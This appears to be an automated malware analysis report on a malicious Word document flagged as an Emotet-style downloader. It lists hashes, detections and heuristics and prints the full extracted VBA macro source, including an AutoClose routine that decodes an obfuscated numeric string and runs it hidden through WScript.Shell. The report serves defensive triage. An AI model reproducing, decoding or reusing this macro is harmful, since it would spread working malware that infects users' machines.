Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9ab27bf6a30dd835…

MALICIOUS

Office (OOXML)

35.9 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-04-18
MD5: 557b1b7fc85e307b26f3cad2aabcfbbc SHA-1: 4c9984a254c5c453a591fbc09edc916a43bec505 SHA-256: 9ab27bf6a30dd835d19c438bee3feeede1749c0ba9ef42fd601830f3950beab6
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoClose function that utilizes WScript.Shell to execute a command. The script appears to be obfuscated, but the presence of WScript.Shell and the AutoClose execution suggests it is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emooodldr-6711604-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(verifica) > 16 Then
        Call CreateObject("WScript.Shell").Run(verifica, vbHide)
      End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(verifica) > 16 Then
        Call CreateObject("WScript.Shell").Run(verifica, vbHide)
      End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
     Call Application.Run("folclore", sfoltire("490925433500034311112318380907460112231807464344232837491400002318060917171442202315384325181319304344122333370012431734384312344043190611014342124534390925421109142002011143152603121249482121090942371400423712354343140404423514344409172108052104091909121934493744262923104342274831323239310831234723262436191200344346432645412333121435121832350944430000231043422748313232393108312624361912003443464326412315384325181319304344122333370012431734384312344043 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2477 bytes
SHA-256: 593f47d7bcf0d0ecad3d5f6cb946ebf967f2c16de23d0be643d01d09cc474b98
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function arrosto(malto As Integer) As String
 Dim enduro() As Variant
 enduro = Array("s", "i", "F", "h", "g", "Z", "C", "E", "T", "o", "$", "l", "t", "O", "a", "(", "=", "m", "-", "b", "d", "/", "?", " ", "\", "w", "'", "v", "B", ",", "j", "A", "P", "S", ".", "r", "X", "y", "N", "D", "W", ";", "n", "e", "c", ")", "x", "+", ":", "p")
 Dim reprimere As Integer
 
 For reprimere = LBound(enduro) To UBound(enduro)
   If reprimere = malto Then
    arrosto = enduro(reprimere)
   End If
 Next
 
End Function

Function sfoltire(Optional umano As String, Optional umano2)
  villano = rustico(Trim(umano))
  For reprimere = 0 To Len(umano)
  
    Dim amico As String
    Dim naturale As Integer
    If (reprimere + 1) <= UBound(villano) Then
    michele = svista(Array(michele, arrosto(Int(villano(reprimere) + villano(reprimere + 1)))))
    reprimere = reprimere + 1
    End If
  Next
  
  sfoltire = michele
End Function


Public Function folclore(verifica As String)
  If Len(verifica) > 16 Then
    Call CreateObject("WScript.Shell").Run(verifica, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("folclore", sfoltire("49092543350003431111231838090746011223180746434423283749140000231806091717144220231538432518131930434412233337001243173438431234404319061101434212453439092542110914200201114315260312124948212109094237140042371235434314040442351434440917210805210409190912193449374426292310434227483132323931083123472326243619120034434643264541233312143512183235094443000023104342274831323239310831262436191200344346432641231538432518131930434412233337001243173438431234404319061101434212453439092542110914203312350142041526031212494821210909423714004237123543431404044235143444091721003449034922012016040919091219264541"))
End Sub

Function svista(satellite As Variant)
 pargolo = ""
 
 For organico = 0 To UBound(satellite)
   pargolo = pargolo & "" & satellite(organico)
 Next
 
 svista = pargolo
End Function



Function rustico(ascolto As String, Optional flacone As Integer) As Variant
    rustico = Split(Left(StrConv(ascolto, vbUnicode), Len(StrConv(ascolto, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: 469f81e757898f7f7db99e966850cb636565814e732852f7273534b39b7fe034
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).